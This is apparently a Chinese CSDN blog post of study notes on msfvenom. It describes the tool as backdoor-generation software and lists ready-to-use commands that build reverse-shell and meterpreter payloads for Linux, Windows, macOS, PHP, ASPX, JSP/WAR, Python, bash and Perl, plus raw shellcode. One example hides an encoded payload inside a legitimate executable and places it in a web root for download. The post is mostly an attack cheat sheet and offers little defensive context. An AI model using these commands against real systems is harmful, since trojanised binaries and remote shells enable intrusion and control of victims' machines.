• msfvenom学习笔记


    msfvenom学习笔记

    来源于啊B的这个视频的学习笔记,但是讲的很乱
    在这里插入图片描述

    什么是msfvenom?

    msfvenom是msfpayload和msfencode的组合,将这两个工具集成在一个框架实例中,就是msfvenom。

    msfvenom是用来生成后门的软件,在目标机器上执行后门后,在本地监听就能上线shell。

    msfvenom常见参数

    在这里插入图片描述

    msfvenom生成可执行文件payload

    linux

    msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.80.130 LPORT=8088 -f elf > shell.elf

    windows

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.80.130 LPORT=8088 -f exe > shell.exe

    mac

    msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.80.130 LPORT=8088 -f macho > shell.macho

    例子

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.80.130 LPORT=5445 -x /root/Desktop/StampRemover.exe x86/shikata_ga_nai -f exe -o /var/www/html/heellloo.exe

    含义:msfvenom可以帮助我们从大量的metasploit有效负载中创建需要的负载,合并到利用程序中。这里使用的编码(-e x86/shikata_ga_nai)的payload ( windows/meterpreter/reverse_tcp),要回连的主机和端口( lhostlport )、模板文件(-x /root/Desktop/StampRemocer.exe )、都会整合到/var/www/html/heello.exe中。

    msfvenom生成各种语言payload

    php

    msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.80.130 LPORT=5443 -f raw > shell.php

    aspx

    msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.80.130 LPORT=5443 -f aspx -o shell.aspx

    jsp

    msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.80.130 LPORT=5445 -f raw > shell.jsp

    java

    msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.80.130 LPORT=5445 -f war > shell.war

    python

    msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.80.130 LPORT=5443 -f raw > shell.py

    bash

    msfvenom -p cmd/unix/reverse_bash LHOST=192.168.80.130 LPORT=5443 -f raw > shell.sh

    perl

    msfvenom -p cmd/unix/reverse_perl LHOST=192.168.80.130 LPORT=5443 -f raw > shell.pl

    msfvenom生成shellcode

    windows

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.80.130 LPORT=5445 -f c

    linux

    msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.80.130 LPORT=5445 -f c

    mac

    msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.80.130 LPORT=5445 -f c

    msfvenom几个监听的参数介绍

    在这里插入图片描述

  • 相关阅读:
    Blender之锁定摄像机到视图方位
    分布式环境下的接口幂等性
    如何理解Python中的self变量?
    面向对象编程原则(06)——依赖倒转原则
    Linux:zabbix自定义监控项(6)
    重磅!由Linux面试出发,看清华大佬教你如何企业级运维实战
    python django 小程序点餐源码
    Android为什么不能在子线程更新UI
    Android/Linux系统学习---目录
    【每日一题Day39】细分图中的可到达节点 | 图论
  • 原文地址:https://blog.csdn.net/zr1213159840/article/details/125470939